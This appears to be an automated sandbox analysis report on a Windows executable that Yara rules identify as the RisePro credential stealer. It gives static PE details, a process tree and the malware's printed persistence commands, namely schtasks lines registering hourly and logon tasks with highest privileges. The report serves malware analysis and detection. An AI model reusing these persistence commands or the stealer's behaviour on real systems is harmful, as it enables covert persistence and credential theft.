                                                                                                                                                                                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6e010000e001000074020000b1020000ee0200009e0300003f04000079040000ba040000f904000004060000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......2.2.."...............................................................................:g0(_k..K.E$.V..).0{c...,......o....H....eS.r..%....|'OMh.'.$...!.............................!4...........T...9+....+B.8....}.-l.M..u..7.^.b...DA....N..B..FW.,.sB......7..v]Y.^.......oZ...4*H.lx..8...... ......................1.. !"#A........?.7.&ttP?/..c1}...T.7........................... .!Aa........?.b..S..k...).......................!1A.. 2Q"Baq.3..........?..Lx1F...-....j52..4.M..r+..p.[......z..../.Y..[.||D.k..K.P/.....]A..t...7l.s..X.o...G.W.2#.Q;^.E.[...zTh%.N..^../c...[.y.....$....................1!qaAQ..... ..........?!K...eHVV!.5...-eX.9M..>...2"..[..F ]+3,...Xm.b.`3..jL.a..Ir..

                                                                                                                                                                                  Chrome Cache Entry: 925

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                  Entropy (8bit):4.568105614797637
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:bh6G3XWZNDrMyMcbtugSUhdei3XWZNDrMyMcbz1h8FfY:bnXS5JtpnS5JZh8Fw
                                                                                                                                                                                  MD5:D101838E73B156A21EA1FD94EBCEEB1D
                                                                                                                                                                                  SHA1:C515B856E4AA0DE6FDAF13536873AFEB0D44D45B
                                                                                                                                                                                  SHA-256:01E64CF9DF1DBF2FB4BFA333E3B2838272081B0BD396AACF340A56FA9252E15D
                                                                                                                                                                                  SHA-512:A13AA569E36F3C68585965FDCC5B54454264E9EE7CB1BAE695EDF70F0716EA6D71D3E0060B39074BD1EA0E5AE9946B8A1CDF80E7A52BEE1DC8CF8E8E2FE79324
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwkbMnFS9SzlUhIFDYOoWz0SBQ3Fk8QkEhcJsA2cf48--pcSBQ14bxIZEgUNxZPEJBIQCXIJePU8PqV8EgUNvYWDDw==?alt=proto
                                                                                                                                                                                  Preview:CiIKEw2DqFs9GgQICRgBGgQIVhgCIAEKCw3Fk8QkGgQISxgCCiIKEw14bxIZGgQICRgBGgQIVhgCIAEKCw3Fk8QkGgQISxgCCg8KDQ29hYMPGgYIARABGAM=

                                                                                                                                                                                  Chrome Cache Entry: 926

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:C source, Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):75995
                                                                                                                                                                                  Entropy (8bit):5.330233242624909
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:r1X8E9coqS/zCct2GhRPXE2IbD71SgUeW7vIUncTUDgNpD5qTqGUMIzA:N8+/zCct2GDPXE2IbD71SgUeW7vIUncs
                                                                                                                                                                                  MD5:77476E9F4544D16E10921CB9D56067F3
                                                                                                                                                                                  SHA1:22677D2DF42EEC873802245EC72BBD8B6896F324
                                                                                                                                                                                  SHA-256:FB9B509D020C4C45AD497DE7C4F7D1B22B4E7DC62339927FBF7E32E227932CB7
                                                                                                                                                                                  SHA-512:86778E76F67A995D3FD9E4A5A6EDE940F5929A50390D578BD12ABBEEEA8FD94C09C8566C831DD92BB6D13A18ED24CE014416693432DD132207F0972B052C3408
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.licdn.com/sc/h/727ucpfhmn0jolb3t2h3o5dkj
                                                                                                                                                                                  Preview:var _0x41e7=['platformKey','getNavigatorPlatform','productKey','product','productSubKey','productSub','vendor','vendorSubKey','getDoNotTrack','incognitoKey','RequestFileSystem','webkitRequestFileSystem','TEMPORARY','storage','estimate','quota','safariIncognito','localStorage','setItem','test','Firefox','open','onerror','onsuccess','indexedDB','PointerEvent','MSPointerEvent','IE\x20','match','join','replace','OPR','Opera','splice','canvasKey','isCanvasSupported','getCanvasFp','isWebGlSupported','getWebglFp','javascriptsKey','scripts','locationKey','hash','host','href','origin','signalsKey','getSignals','getAdBlock','getHasLiedLanguages','getHasLiedResolution','getHasLiedOs','hasMinFlashInstalled','fonts','swfPath','loadSwfAndDetectFonts','missing\x20options.fonts.swfPath','flash\x20not\x20installed','swf\x20object\x20not\x20loaded','jsFontsKey','monospace','serif','Andale\x20Mono','Arial','Arial\x20Hebrew','Arial\x20MT','Arial\x20Narrow','Arial\x20Rounded\x20MT\x20Bold','Arial\x20Unicod

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Entropy (8bit):7.963129291166755
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:I2jCDr35mu.exe
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5:758c5213c3ffebe919633188f8c07747
                                                                                                                                                                                  SHA1:fa534e53d645f69d1c950d8ff17e11e877ca970b
                                                                                                                                                                                  SHA256:b50becdb79b109e85caa4f588343fdd7e96152f4e23f40ad213a0336118bc87b
                                                                                                                                                                                  SHA512:783cee4a35dab87271a126b8ae46f41e636ff9afeb2dc5620723fed828c4c72f991127ff7b8fd1de287cb8f63b825fe0ebeda7585b66acd1411b7050b2f1bda9
                                                                                                                                                                                  SSDEEP:49152:ov+pa5Mxg2VmKxuou1saUJ3iuL+y8g9Rdi8ZNaFwbdwUdUL:1pa5Mx9oKhaKdL+Lgo8ZoF0dw5L
                                                                                                                                                                                  TLSH:E4B53381F88175B1EC3B00B958BF4F136F2EC64691F44E79369E2348ADF36589069AB1
                                                                                                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....

                                                                                                                                                                                  File Icon

                                                                                                                                                                                  Icon Hash:b2b2b3b2e4e66638

                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                  General

                                                                                                                                                                                  Entrypoint:0x9a3000
                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x65D4404E [Tue Feb 20 06:01:50 2024 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                  Instruction
                                                                                                                                                                                  jmp 00007F7E9481970Ah
                                                                                                                                                                                  pcmpgtd mm4, qword ptr [ebx]
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add cl, ch
                                                                                                                                                                                  add byte ptr [eax], ah
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax+00000000h], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [edi], al
                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add dword ptr [edx], ecx
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add ecx, dword ptr [edx]
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  pop es
                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add dword ptr [edx], ecx
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  and byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  and dword ptr [eax], eax
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add al, 0Ah
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  inc eax
                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax+eax*4], cl
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                                  Data Directories

                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x13b0540x68.idata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1370000x3168.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x13b1f80x8.idata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                  Sections

                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  0x10000x1360000x8f0004ce034d88730e6ad731d2bea04f7c0ccFalse0.9993802584134616data7.98730344696013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0x1370000x31680x18004e9d27655c390b18e6f57f196fbe580aFalse0.9197591145833334data7.627914612238417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .idata 0x13b0000x10000x2001e17ac6f9d72045027c75c82e74ad637False0.14453125data0.9942709484982628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  0x13c0000x2c10000x2002aa5c9ea79012f9982c77cb5d8b5baf7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  awogigmw0x3fd0000x1a50000x1a440088667f4cb8358d5af8303c7a37294116False0.9910564070865556data7.953507397861078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  nkfwixkm0x5a20000x10000x6003464ae5b7cd78aa5afa57b282f45e8baFalse0.5690104166666666data4.903298889295569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .taggant0x5a30000x30000x22005b2d59f8e7293c82dd90c8a7e73181f5False0.08168658088235294DOS executable (COM)1.0717145610010668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                  Resources

                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_ICON0x59e36c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0RussianRussia0.3333333333333333
                                                                                                                                                                                  RT_ICON0x59e6540x128Device independent bitmap graphic, 16 x 32 x 4, image size 0RussianRussia0.5777027027027027
                                                                                                                                                                                  RT_ICON0x59e77c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RussianRussia0.4165162454873646
                                                                                                                                                                                  RT_ICON0x59f0240x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RussianRussia0.42991329479768786
                                                                                                                                                                                  RT_ICON0x59f58c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RussianRussia0.5159474671669794
                                                                                                                                                                                  RT_ICON0x5a06340x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RussianRussia0.6338652482269503
                                                                                                                                                                                  RT_GROUP_ICON0x5a0a9c0x5adataRussianRussia0.7111111111111111
                                                                                                                                                                                  RT_VERSION0x5a0af60x33cdataRussianRussia0.44806763285024154
                                                                                                                                                                                  RT_MANIFEST0x5a0e320x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                                                                                                                                                                  RT_MANIFEST0x5a11180x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                  Imports

                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  kernel32.dlllstrcpy

                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                  RussianRussia
                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:12:28:57
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:12:29:00
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                  Start time:12:29:02
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  • Detection: 39%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:12:29:02
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:12:29:11
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 39%, ReversingLabs
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:12:29:19
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe"
                                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                                  File size:917'504 bytes
                                                                                                                                                                                  MD5 hash:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:12:29:19
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:12:29:19
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                  File size:2'328'576 bytes
                                                                                                                                                                                  MD5 hash:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                  Start time:12:29:20
                                                                                                                                                                                  Start date:21/02/2024
